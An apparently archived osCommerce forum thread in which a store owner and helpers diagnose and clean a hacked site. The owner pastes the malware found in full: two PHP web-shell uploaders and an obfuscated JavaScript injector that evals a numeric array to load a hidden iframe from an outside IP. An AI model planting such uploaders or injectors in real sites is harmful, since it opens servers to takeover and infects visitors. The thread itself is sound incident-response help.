Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

Racing Club

Error in a homepage

28 posts in this topic

hello

 

I have a problem.

 

From 1 day to another my web change. Before it worked fine. But now I see this message on the homepage and the admin:

 

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

 

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26

 

----------------------------------------------

 

Line 35: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

 

Line 26: <! doctype html public "- / / W3C / / DTD HTML 4.01 Transitional / / EN">

 

Please help.

 

Thanks

 

I use version v2.2RC2a of oscommerce

Share this post


Link to post
Share on other sites

Ariel,

 

check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.

 

 

 

 

Chris

Share this post


Link to post
Share on other sites

Thanks for replying

 

index.php of homepage:

 

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

// the following cPath references come from application_top.php

$category_depth = 'top';

if (isset($cPath) && tep_not_null($cPath)) {

$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");

$cateqories_products = tep_db_fetch_array($categories_products_query);

if ($cateqories_products['total'] > 0) {

$category_depth = 'products'; // display products

} else {

$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");

$category_parent = tep_db_fetch_array($category_parent_query);

if ($category_parent['total'] > 0) {

$category_depth = 'nested'; // navigate through the categories

} else {

$category_depth = 'products'; // category has no products, but display the 'no products' message

}

}

}

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

 

index.php of admin:

 

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2007 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

$languages = tep_get_languages();

$languages_array = array();

$languages_selected = DEFAULT_LANGUAGE;

for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {

$languages_array[] = array('id' => $languages[$i]['code'],

'text' => $languages[$i]['name']);

if ($languages[$i]['directory'] == $language) {

$languages_selected = $languages[$i]['code'];

}

}

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

Share this post


Link to post
Share on other sites

Ariel,

 

Are you sure you didn't make recent changes to accommodate additional language support ?

 

In the index.php, this:

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

 

Should be this:

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

?>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS;>

<head>

 

 

NOTE the ?> BEFORE the doctype line ? It is also missing in your /admin/index.php and the language code

 

$languages = tep_get_languages();

$languages_array = array();

$languages_selected = DEFAULT_LANGUAGE;

for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {

$languages_array[] = array('id' => $languages[$i]['code'],

'text' => $languages[$i]['name']);

if ($languages[$i]['directory'] == $language) {

$languages_selected = $languages[$i]['code'];

}

}

 

is not standard in the default download.

 

 

 

 

Chris

Share this post


Link to post
Share on other sites

I didn´t make any changes recently and I don´t touch anything.

 

I try what you said and didn´t work.

 

Thanks

Share this post


Link to post
Share on other sites

Ariel,

 

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

 

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

// the following cPath references come from application_top.php

$category_depth = 'top';

if (isset($cPath) && tep_not_null($cPath)) {

$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");

$cateqories_products = tep_db_fetch_array($categories_products_query);

if ($cateqories_products['total'] > 0) {

$category_depth = 'products'; // display products

} else {

$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");

$category_parent = tep_db_fetch_array($category_parent_query);

if ($category_parent['total'] > 0) {

$category_depth = 'nested'; // navigate through the categories

} else {

$category_depth = 'products'; // category has no products, but display the 'no products' message

}

}

}

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

?>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS; ?>>

<head>

 

 

Chris

Share this post


Link to post
Share on other sites

DunWeb,

 

I have a backup of my website, but I wanted to see if someone had hacked my website

Share this post


Link to post
Share on other sites

It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.

 

 

 

Chris

Share this post


Link to post
Share on other sites

Url:

www.videoclublasflores.com.ar

 

 

Thanks for all

Share this post


Link to post
Share on other sites

You have hack files all over in the images folder.

:o

 

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

Share this post


Link to post
Share on other sites

Recently I started to see the images folder and I found this (as you are saying):

 

ina.htm: HACKED BY <h4> <center> kaMtiEz </ h4> </ center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </ h4> </ center>

 

indonesia.htm: <html><head>

 

 

 

<title>Hacker Indonesia</title><style type="text/css">

 

html, body {

 

color: white;

 

background-color: #000080;

 

}

 

 

 

a {

 

background-color: transparent;

 

color: #ffffff;

 

}

 

 

 

#p404 {

 

position: absolute;

 

top: 20%;

 

left: 0px;

 

width: 100%;

 

height: 1px;

 

overflow: visible;

 

visibility: visible;

 

display: block;

 

}

 

 

 

#content {

 

margin-left: -320px;

 

position: absolute;

 

top: -100px;

 

left: 50%;

 

width: 640px;

 

height: 200px;

 

visibility: visible;

 

}

 

 

 

#errormessage {

 

font: 50px garamond;

 

line-height: 200%;

 

text-align: center;

 

}

 

 

 

#title, #footer {

 

text-align: center;

 

}

 

 

 

#title span {

 

background-color: #c0c0c0;

 

color: #000080;

 

}

 

</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>

 

<div id="p404">

 

<div id="content">

 

<div id="errormessage">

 

<p>Hacked by Hmei7</p>

 

</p>

 

</div>

 

</div>

 

</div>

 

</body></html>

 

kacuk.php: ==kacuk

 

<?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?>

 

==

 

x.htm: <b><font size="5">by iskorpitx</font></b>

 

 

(I'm not sure)

put.php: <?php

 

echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';

 

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

 

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

 

if( $_POST['_upl'] == "Upload" ) {

 

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }

 

else { echo '<b>Upload Fail !!!</b><br><br>'; }

 

}

 

?>

 

----------------------------------

 

 

I'll keep the advice you gave me on "Securing the ADMIN.

but Can I get my website as it was before?

What should I do?

Share this post


Link to post
Share on other sites

Ariel,

 

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) [Removed].

 

 

 

Chris

Share this post


Link to post
Share on other sites

I delete this files from the images folder:

 

ina.htm

indonesia.htm

kacuk.php

x.htm

put.php

 

 

In point 2 where you asked me to find these keywords:

eval base64 decode

 

At those words found in a few files called:

googleff7fe2850f15ebd7.php

googlebc44d7671aae3b3e.php

google7a14fb0c01e4e5d1.php

 

What should I do?

Share this post


Link to post
Share on other sites

Those are all hack files.

 

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

 

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove and and all php files from the images folder.

Share this post


Link to post
Share on other sites

Jan,

 

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help ? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.

 

 

 

For the record, here is #10 on the list again:

 

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

I welcome your response here in the forum, so everyone can see it.

 

 

 

Chris

Share this post


Link to post
Share on other sites

I delete these files and tomorrow I will download version 2.2 for correction of the two index.php

 

Thanks

 

I hope it works

Share this post


Link to post
Share on other sites

At the footer of the index.php I found this:

 

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var ucyq=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var vpm=r.cssRules||r.rules;for(var lqf=0;lqf<vpm.length;lqf++){var gl=vpm.item?vpm.item(lqf):vpm[lqf];if(!gl.selectorText.match(/#va/))continue;qq=(gl.cssText)?gl.cssText:gl.style.cssText;ucyq=qq.match(/(S[^")]+)/)[1];zio=gl.selectorText.substr(1);};}catch(e){};}oe=new Date(2010,11,3,2,21,4);t=oe.getSeconds();var vo=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,228/t,208/t,184/t,216/t,204/t,184/t,200/t,208/t,208/t,184/t,212/t,220/t,188/t,476/t,204/t,396/t,188/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var fme="";var g=function(){return this;}();tevq=g["e"+zio+"l"];var cet="";hj=tevq(ucyq);for(var i=0;i<vo.length;i++){aig=tevq(vo);cet+=hj(aig);}tevq(cet);</script>

 

I already removed and now I'm adding this:

?>

because it is missing several lines.

 

I'll report how I progress.

 

Thanks!

 

I was slow to respond because I spent the whole afternoon removing a virus in my computer

Share this post


Link to post
Share on other sites

I am done!

Now when I go to my website or the admin page goes blank.

 

I see when loading Internet Explorer other addresses down

 

Thanks!

Share this post


Link to post
Share on other sites

Ariel,

 

If you are seeing other URL's in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags.

 

 

 

 

Chris

Share this post


Link to post
Share on other sites

Chris,

 

Look at the footer of my browser:

 

16lmsz9.jpg

 

 

vdo4k9.jpg

 

 

2m5zb53.jpg

 

What should I do?

Share this post


Link to post
Share on other sites

That only happens when I open my website with Internet Explorer with Mozilla Firefox does not happen.

 

Someone could go to my website and see if the same please

 

Thanks

Share this post


Link to post
Share on other sites

Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

 

 

 

Chris

Share this post


Link to post
Share on other sites

Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

Chris

 

What do you see?

 

because I delete temp files and cookies and I keep seeing the same thing

 

Thanks!

Share this post


Link to post
Share on other sites